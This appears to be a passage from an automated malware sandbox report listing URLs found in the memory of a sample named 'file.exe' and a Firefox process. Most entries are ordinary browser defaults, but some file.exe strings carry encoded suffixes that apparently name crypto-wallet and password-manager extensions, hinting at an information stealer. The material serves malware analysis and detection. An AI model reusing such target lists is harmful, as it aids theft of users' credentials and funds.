Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E40A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071808582.00000270DB7A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://cb979336-dcad-4f54-b8e3-59863639e
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105353259.00000270E4036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001E.00000002.3087332031.00000270DDB82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2985260452.00000270E45EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2991682330.00000270E44BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search--button-primary-active-bgcolor
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114697021.000030E187A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052198523.00000270DA32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D627F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3029136632.000000DC1CB3C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052198523.00000270DA330000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001E.00000002.3111886581.00000270E5C5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3002701967.00000270DBF4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3101620325.00000270E23D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/AppUpdater.sys.mjsresource://gre/modules/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.comZ
Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
